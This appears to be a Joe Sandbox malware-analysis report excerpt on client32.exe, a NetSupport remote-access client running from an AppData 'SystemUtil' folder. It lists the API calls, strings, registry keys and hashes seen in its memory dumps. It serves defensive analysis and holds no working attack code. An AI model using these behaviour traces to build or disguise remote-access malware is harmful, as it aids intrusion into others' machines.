                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick
                                                                                                                                                                                                    • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                                                                                                                    • API String ID: 536389180-1512301160
                                                                                                                                                                                                    • Opcode ID: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                                                                                    • Instruction ID: e3d06188695ac204c7c53c5cb05177b21b7d5d04c4fed9e193d22ae282c8029d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D021E770A213A64EFF938AE5DD84765FE895780FAEF004139D420956CCE7749480DF56
APIs
• send.WSOCK32(?,?,?,00000000), ref: 68599C93
• timeGetTime.WINMM(?,?,?,00000000), ref: 68599CD0
• Sleep.KERNEL32(00000000), ref: 68599CDE
• LeaveCriticalSection.KERNEL32(?), ref: 68599D4F
• InterlockedIncrement.KERNEL32(?), ref: 68599D72
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
• Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
• String ID: 3'
• API String ID: 77915721-280543908
• Opcode ID: 442c41e9bc28b70ce4ebe149dcb238cc43588a35f0f8e0baf2466afce3e96441
• Instruction ID: 236607c0a8a5709804ead984073072827bcf7aa643f65f3bb03ea8ca8f484ff1
• Opcode Fuzzy Hash: 442c41e9bc28b70ce4ebe149dcb238cc43588a35f0f8e0baf2466afce3e96441
• Instruction Fuzzy Hash: 63216D75A042288FDF20DF64CC88B9AB7B8AF45314F4542D5E91D9B281CA30ED84CF91
APIs
• GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 110259F6
• K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11025A12
• GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025A26
• SetLastError.KERNEL32(00000078), ref: 11025A49
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorFileImageLastNameProcess
• String ID: GetModuleFileNameExA$GetProcessImageFileNameA
• API String ID: 4186647306-532032230
• Opcode ID: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
• Instruction ID: 68c8d787ea85bb7251c32f91647a1931aca61929af41b034d7bc2fd00ab8f334
• Opcode Fuzzy Hash: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
• Instruction Fuzzy Hash: 46018036A41315AFD321DF69EC84F8BB7E8EB89765F10452AF986D7600D631E800CBB4
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001), ref: 1110C2C7
• CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1110C2EA
• WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C317
• CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C321
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                                                                                    • API String ID: 3360349984-1136101629
                                                                                                                                                                                                    • Opcode ID: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                                                                                                    • Instruction ID: a3115959ccdc6595f724f67194249590caf2e9fcdd86f69c2c7dc21ad5a21c7d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D01D4367403126FE7208E99DC89F4BBBA8EB54765F108128FA15876C0DA70E404CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: %s%s%s.bin$305090$_HF$_HW$_SW
                                                                                                                                                                                                    • API String ID: 2111968516-1635371599
                                                                                                                                                                                                    • Opcode ID: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                                                                                                    • Instruction ID: fca8ef28a5c1b47a0d785ddae3209236aee7f502678e08843e7b704547fe2850
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5E09BA0D2060C5FF3005159AC01BAFBBAC1F4434AF80C0D0FEE9A6A82E974944086D5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FFD13
                                                                                                                                                                                                    • GetStockObject.GDI32(00000004), ref: 110FFD6B
                                                                                                                                                                                                    • RegisterClassA.USER32(?), ref: 110FFD7F
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 110FFDBC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                                                                                                    • String ID: NSMDesktopWnd
                                                                                                                                                                                                    • API String ID: 2669163067-206650970
                                                                                                                                                                                                    • Opcode ID: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                                                                                                    • Instruction ID: e76810456149084fb848040635d8e5dd78421bccde4647aa26b9c0cc0d967c72
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0231F7B5D01259AFCB41DFA9D880A9EFBF8FB09314F50862EE569E3240E7345940CF95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                                                    • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                                                                                                    • API String ID: 47109696-3245241687
                                                                                                                                                                                                    • Opcode ID: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                                                                                    • Instruction ID: a36c5406095c56a7772cd5309942c79e158504ca27ae800c645d53ad84447c87
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A921CD75F0022A5BE710DAA8CD80F9AF7B89B45714F2045AAD95DF3140E731BE458B71
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110E3C0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                                                                                                      • Part of subcall function 1110E3C0: __wsplitpath.LIBCMT ref: 1110E405
                                                                                                                                                                                                      • Part of subcall function 1110E3C0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 1110E508
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                                                                                                    • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                                                                                                    • API String ID: 806825551-1858614750
                                                                                                                                                                                                    • Opcode ID: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                                                                                    • Instruction ID: 783a1893864e797c111924e05002c86c7d14abf0d26c6a4cafca36759f9e265b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E214936E052A616D301CE369D807BFFFBADF86614F054978EC51D7102F626E5048751
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002F0,000000FF), ref: 1101755C
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                                                                                                    • CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                                                                                                    • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                                                                                                    • API String ID: 2994556011-578995875
                                                                                                                                                                                                    • Opcode ID: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                                                                                    • Instruction ID: 2dfd674cbcced21787933601e0fbf0765c8f89b6bf193c9c24077654eb832309
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D62129B1E006669BDF11CBA0CC44B6EB7E89F45358F1000B5FC58DA2C8FAB8E940D791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11140290: GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                                                                                      • Part of subcall function 11140290: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SystemUtil\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408C5
                                                                                                                                                                                                    • ResetEvent.KERNEL32(00000254), ref: 111408D9
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000254), ref: 111408EF
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408FE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                                                                                                    • String ID: MiniDump
                                                                                                                                                                                                    • API String ID: 1494854734-2840755058
                                                                                                                                                                                                    • Opcode ID: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                                                                                                    • Instruction ID: 82be7c26d502f028142b998fa5126df4c28d1bc7d262cc6800bde2f36eb64e35
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
• Instruction Fuzzy Hash: F311D675E0022667F700DFE9CC81F9AB7689B05B68F214234F624E66C4E761A5418BA5

APIs
• WaitForSingleObject.KERNEL32(000002F0,000000FF), ref: 11017472
• CoInitialize.OLE32(00000000), ref: 1101747B
• CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: InitializeObjectSingleUninitializeWait
• String ID: ChassisTypes$Win32_SystemEnclosure
• API String ID: 2994556011-2037925671
• Opcode ID: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
• Instruction ID: d4ceec51b3d1aeb93fa2206dcf0162908bfa0d380c5fa1549f26343d1b5ce827
• Opcode Fuzzy Hash: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
• Instruction Fuzzy Hash: 29213575D406655BDB12CBA4CC45BAEBBED9F84358F0000A4EC58DB288EF39D900C761

APIs
  • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
• SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,24DE4E77,?,?,?,Function_00186DCB,000000FF), ref: 1102CDC7
  • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
  • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
• CreateEventA.KERNEL32 ref: 1102CD8A
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Event$Create$__wcstoi64_memsetwsprintf
• String ID: (r$Client$DisableGeolocation
• API String ID: 2598271332-1772389313
